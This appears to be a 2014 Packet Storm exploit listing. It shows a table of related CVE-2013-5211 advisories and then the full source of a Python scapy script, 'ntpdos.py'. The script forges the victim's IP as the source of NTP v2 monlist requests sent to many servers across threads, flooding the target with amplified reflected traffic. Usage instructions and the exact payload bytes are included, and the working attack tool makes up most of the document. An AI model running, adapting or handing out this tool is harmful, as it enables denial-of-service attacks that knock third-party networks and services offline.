NTP Amplification Denial Of Service Tool

🗓️ 16 Jul 2014 00:00:00Reported by DaRkReDType

packetstorm🔗 packetstormsecurity.com👁 830 Views

NTP Amplification Denial Of Service Tool using Python script to flood target with NTP v2 Monlist Packet

Reporter	Title	Published	Views	Family All 144
0day.today	NTP ntpd monlist Query Reflection - Denial of Service	29 Apr 201400:00	–	zdt
IBM Security Bulletins	Security Bulletin: IBM BladeCenter Advanced Management Module Account Information Exposure (CVE-2013-5211)	14 Apr 202314:32	–	ibm
IBM Security Bulletins	Security Bulletin: Vyatta 5600 vRouter Software Patches - Release 1801-zb	11 Sep 201917:35	–	ibm
IBM Security Bulletins	Security Bulletin: Three potential vulnerabilities in IBM GCM16/GCM32 Global Console Managers (CVE-2014-3085, CVE-2014-3081, CVE-2014-3080)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by security vulnerabilities. (CVE-2013-5772, CVE-2013-5803, CVE-2013-5372, CVE-2013-5780, CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Flex System Manager (FSM) is affected by vulnerability (CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: Libxml2 vulnerabilities in Network Intrusion Prevention System (CVE-2014-0191, CVE-2013-2877, CVE-2014-3660, CVE-2013-5211)	23 Feb 202219:48	–	ibm
IBM Security Bulletins	Security Bulletin: The IBM Chassis Management Module (CMM) is affected by a vulnerability in NTP server (CVE-2013-5211)	31 Jan 201901:25	–	ibm
IBM Security Bulletins	Security Bulletin: NTP vulnerability in Network Intrusion Prevention System (CVE-2013-5211)	23 Feb 202219:48	–	ibm
IBM Security Bulletins	Security Bulletin: IBM Virtualization Engine TS7700 - The NTP monlist command is enabled (CVE-2013-5211)	18 Jun 201800:09	–	ibm

`#!/usr/bin/env python  
from scapy.all import *  
import sys  
import threading  
import time  
#NTP Amp DOS attack  
#by DaRkReD  
#usage ntpdos.py <target ip> <ntpserver list> <number of threads> ex: ntpdos.py 1.2.3.4 file.txt 10  
  
#packet sender  
def deny():  
#Import globals to function  
global ntplist  
global currentserver  
global data  
global target  
ntpserver = ntplist[currentserver] #Get new server  
currentserver = currentserver + 1 #Increment for next   
packet = IP(dst=ntpserver,src=target)/UDP(sport=48947,dport=123)/Raw(load=data) #BUILD IT  
send(packet,loop=1) #SEND IT  
  
#So I dont have to have the same stuff twice  
def printhelp():  
print "NTP Amplification DOS Attack"  
print "By DaRkReD"  
print "Usage ntpdos.py <target ip> <ntpserver list> <number of threads>"  
print "ex: ex: ntpdos.py 1.2.3.4 file.txt 10"  
print "NTP serverlist file should contain one IP per line"  
print "MAKE SURE YOUR THREAD COUNT IS LESS THAN OR EQUAL TO YOUR NUMBER OF SERVERS"  
exit(0)  
  
if len(sys.argv) < 4:  
printhelp()  
#Fetch Args  
target = sys.argv[1]  
  
#Help out idiots  
if target in ("help","-h","h","?","--h","--help","/?"):  
printhelp()  
  
ntpserverfile = sys.argv[2]  
numberthreads = int(sys.argv[3])  
#System for accepting bulk input  
ntplist = []  
currentserver = 0  
with open(ntpserverfile) as f:  
ntplist = f.readlines()  
  
#Make sure we dont out of bounds  
if numberthreads > int(len(ntplist)):  
print "Attack Aborted: More threads than servers"  
print "Next time dont create more threads than servers"  
exit(1)  
  
#Magic Packet aka NTP v2 Monlist Packet  
data = "\x17\x00\x03\x2a" + "\x00" * 4  
  
#Hold our threads  
threads = []  
print "Starting to flood: "+ target + " using NTP list: " + ntpserverfile + " With " + str(numberthreads) + " threads"  
print "Use CTRL+C to stop attack"  
  
#Thread spawner  
for n in range(numberthreads):  
thread = threading.Thread(target=deny)  
thread.daemon = True  
thread.start()  
  
threads.append(thread)  
  
#In progress!  
print "Sending..."  
  
#Keep alive so ctrl+c still kills all them threads  
while True:  
time.sleep(1)  
`

16 Jul 2014 00:00Current

EPSS0.92136